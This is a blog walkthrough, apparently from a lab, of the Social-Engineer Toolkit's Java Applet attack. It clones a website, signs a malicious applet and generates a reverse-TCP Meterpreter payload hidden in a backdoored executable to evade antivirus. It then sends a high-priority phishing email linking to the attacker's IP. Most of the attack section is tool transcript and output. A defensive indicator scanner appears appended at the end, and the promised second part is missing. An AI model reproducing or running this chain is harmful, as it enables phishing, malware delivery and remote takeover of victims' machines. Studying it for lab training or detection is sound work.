# 4. Social Engineering Tools

## Contents

- Part 1: Java Applet Attack Method
- Part 2: Credential Harvester Attack Method

## Part 1: Java Applet Attack Method

### Introduction to SET

SET is an advanced, multi-function, and easy-to-use computer-assisted social engineering toolset. It helps you to prepare the most effective way of exploiting client-side application vulnerabilities and make a fascinating attempt to capture the target's confidential information (for example, e-mail passwords). Some of the most efficient and useful attack methods employed by SET include targeted phishing e-mails with a malicious file attachment, Java applet attacks, browser-based exploitation, gathering website credentials, creating infectious portable media (USB/DVD/CD), mass-mailer attacks, and other similar multi-attack web vectors. This combination of attack methods provides a powerful platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.

### Topology

Attacker, BackTrack (`root@bt`), 162.168.1.102 on `eth1`:

```text
root@bt:~# ifconfig eth1
eth1      Link encap:以太网  硬件地址 00:0c:29:f8:2a:28
          inet 地址:162.168.1.102  广播:162.168.1.255  掩码:255.255.255.0
          inet6 地址: fe80::20c:29ff:fef8:2a28/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  跃点数:1
          接收数据包:20464 错误:0 丢弃:0 过载:0 帧数:0
          发送数据包:38685 错误:0 丢弃:0 过载:0 载波:0
          碰撞:0 发送队列长度:1000
          接收字节:2995416 (2.9 MB)  发送字节:2585033 (2.5 MB)

root@bt:~# netstat -r
内核 IP 路由表
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
162.168.1.0     *               255.255.255.0   U         0 0          0 eth1
default         162.168.1.2     0.0.0.0         UG        0 0          0 eth1
```

Victim, Windows host `Smoke-PC`, 162.168.1.101, followed by a connectivity check:

```text
C:\Users\Smoke>ipconfig /all

Windows IP 配置

   主机名  . . . . . . . . . . . . . : Smoke-PC
   主 DNS 后缀 . . . . . . . . . . . :
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否

无线局域网适配器 无线网络连接:

   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : 1x1 11b/g/n Wireless LAN PCI Express Half Mini Card Adapter
   物理地址. . . . . . . . . . . . . : 7C-E9-D3-F8-4B-87
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::c104:d994:990d:a57e%17(首选)
   IPv4 地址 . . . . . . . . . . . . : 162.168.1.101(首选)
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   获得租约的时间  . . . . . . . . . : 2015年4月15日 16:48:24
   租约过期的时间  . . . . . . . . . : 2015年4月15日 23:48:23
   默认网关. . . . . . . . . . . . . : 162.168.1.2
   DHCP 服务器 . . . . . . . . . . . : 162.168.1.2
   DHCPv6 IAID . . . . . . . . . . . : 578611667
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-CC-98-0C-3C-97-0E-18-96-17
   DNS 服务器  . . . . . . . . . . . : 221.11.1.67
                                       221.11.1.68
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

C:\Users\Smoke>ping www.baidu.com

正在 Ping www.a.shifen.com [61.135.169.121] 具有 32 字节的数据:
来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54
来自 61.135.169.121 的回复: 字节=32 时间=41ms TTL=54
来自 61.135.169.121 的回复: 字节=32 时间=36ms TTL=54
来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54

61.135.169.121 的 Ping 统计信息:
    数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
    最短 = 35ms,最长 = 41ms,平均 = 36ms
```

### Editing the configuration file (1)

```text
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# cd config/
root@bt:/pentest/exploits/set/config# ls
mailing_list.txt  set_config  set_config.save  set_config.save.1  slim_set.py
root@bt:/pentest/exploits/set/config# vim set_config
```

The settings changed in `set_config`:

```text
METASPLOIT_PATH=/pentest/exploits/framework3
ETTERCAP=ON
EMAIL_PROVIDER=GMAIL
SELF_SIGNED_APPLET=ON
JAVA_ID_PARAM=Secure Java Applet
```

### Launching SET

```text
root@bt:/pentest/exploits/set/config# cd ..
root@bt:/pentest/exploits/set# ./set

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]        Development Team: JR DePre (pr1me)        [---]
[---]        Development Team: Joey Furr (j0fer)       [---]
[---]        Development Team: Thomas Werth            [---]
[---]                 Version: 2.4.1                   [---]
[---]              Codename: 'Renegade'                [---]
[---]         Report bugs: [email protected]           [---]
[---]       Follow me on Twitter: dave_rel1k           [---]
[---]       Homepage: http://www.secmaniac.com         [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
```

The banner is printed again, followed by the social-engineering attack menu:

```text
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) Third Party Modules

  99) Return back to the main menu.

set> 2
```

### Web attack vector: Java Applet

```text
 The Web Attack module is a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit browser
 exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a website that
 has a username and password field and harvest all the information posted to
 the website.

 The TabNabbing method will wait for a user to move to a different tab, then
 refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and utilizes
 HTTP REFERER's in order to intercept fields and harvest data from them. You
 need to have an already vulnerable site and incorporate
 <script src="http://YOURIP/">. This could either be from a compromised site
 or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent and the
 Back|Track team. This method utilizes iframe replacements to make the
 highlighted URL link to appear legitimate however when clicked a window pops
 up then is replaced with the malicious link. You can edit the link
 replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web
 attack menu. For example you can utilize the Java Applet, Metasploit
 Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle
 attack all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>1

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing and allow
 you to utilize the attack vectors within the completely same web application
 you were attempting to clone.

 The third method allows you to import your own website, note that you should
 only have an index.html when using the import website functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

 Simply enter in the required fields, easy example below:

 Name: FakeCompany
 Organization: Fake Company
 Organization Name: Fake Company
 City: Cleveland
 State: Ohio
 Country: US
 Is this correct: yes

 [!] *** WARNING ***
 [!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk
 [!] *** WARNING ***

您的名字与姓氏是什么?
  [Unknown]:  cisco
您的组织单位名称是什么?
  [Unknown]:  cisco
您的组织名称是什么?
  [Unknown]:  cisco
您所在的城市或区域名称是什么?
  [Unknown]:  bj
您所在的州或省份名称是什么?
  [Unknown]:  bj
该单位的两字母国家代码是什么
  [Unknown]:  cn
CN=cisco, OU=cisco, O=cisco, L=bj, ST=bj, C=cn 正确吗?
  [否]:  y

警告: 签名者证书将在六个月内过期。
[*] Java Applet is now signed and will be imported into the website
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.baidu.com

[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: IierAbDuaKTT
[*] Malicious java applet website prepped for deployment
```

### Payload and encoding

```text
 What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            New custom interactive reverse shell designed for SET
  12) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  13) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  14) Import your own executable              Specify a path for your own executable

set:payloads>2

 Below is a list of encodings to try and bypass AV.

 Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

set:encoding>16
set:payloads> PORT of the listener [443]:
[*] Generating x64-based powershell injection code...
/bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录
[*] Generating x86-based powershell injection code...
/bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录
[*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate
[*] Generating OSX payloads through Metasploit...
[*] Generating Linux payloads through Metasploit...

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]

[-] Launching MSF Listener...
[-] This may take a few to load MSF...
```

### Sending the phishing e-mail

```text
 Social Engineer Toolkit Mass E-Mailer

 There are two options on the mass e-mailer, the first would
 be to send an email to one individual person. The second option
 will allow you to import a list and send it to as many people as
 you want within that list.

 What do you want to do:

   1.  E-Mail Attack Single Email Address
   2.  E-Mail Attack Mass Mailer

  99.  Return to main menu.

set:mailer>1
set:phishing> Send email to:[email protected]
set:phishing>1
set:phishing> Your gmail email address: :[email protected]
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
set:phishing> Email subject:pls check this sites
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:pls check this sites
Next line of the body: http://162.168.1.102
Next line of the body: ^C
```
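The mail sent above and the cloned page it points at leave indicators a defender can look for. As an added example, not part of the original post and not SET's own code, this Python script triages a constructed copy of that phishing mail and a constructed cloned page: it flags the high-priority marking (assumed here to be an `X-Priority: 1` header), links served over plain HTTP from a bare IP such as http://162.168.1.102, an embedded `<applet>`, and a `<script src>` fetched from an IP-literal host, the shape of the `<script src="http://YOURIP/">` injection the web attack menu describes.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Constructed samples: the high-priority mail whose only link is a bare IP, and
# a cloned page that embeds a signed applet plus a script pulled from that IP.
SAMPLE_EML = ("Subject: pls check this sites\nX-Priority: 1\nContent-Type: text/plain\n\n"
              "pls check this sites\nhttp://162.168.1.102\n")
SAMPLE_HTML = ('<html><body><applet code="Java.class" archive="Java.jar"></applet>'
               '<script src="http://162.168.1.102/x.js"></script></body></html>')

def ip_literal_host(url):
    # Return the host when the URL addresses a bare IP rather than a DNS name, else None.
    host = urlparse(url).hostname or ""
    try:
        return str(ip_address(host))
    except ValueError:
        return None

def scan_email(raw):
    # Indicators in one message: priority flag, plain-http links, IP-literal hosts.
    msg = message_from_string(raw)
    findings = []
    if msg.get("X-Priority", "").strip().startswith("1"):  # assumed 'high priority' header
        findings.append("high-priority flag")
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    for url in URL_RE.findall(body):
        if urlparse(url).scheme == "http":
            findings.append("plain-http link: " + url)
        if ip_literal_host(url):
            findings.append("ip-literal host: " + ip_literal_host(url))
    return findings

class _PageScanner(HTMLParser):
    """Flag <applet> tags and <script src> fetched from an IP-literal host."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self.findings.append("applet: " + (a.get("archive") or a.get("code") or "?"))
        if tag == "script" and a.get("src") and ip_literal_host(a["src"]):
            self.findings.append("script from ip-literal host: " + a["src"])

def scan_page(html):
    p = _PageScanner()
    p.feed(html)
    return p.findings
```

Run against real mail or a fetched page, each finding is a reason to hold the message or block the host; none of them alone is proof, but the combination seen in this walkthrough is rare in legitimate traffic.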
Tags: BT5, 2011.4, set, JAVA, Normal, Windows, ---, Attack, SET

From: https://www.cnblogs.com/smoke520/p/18370545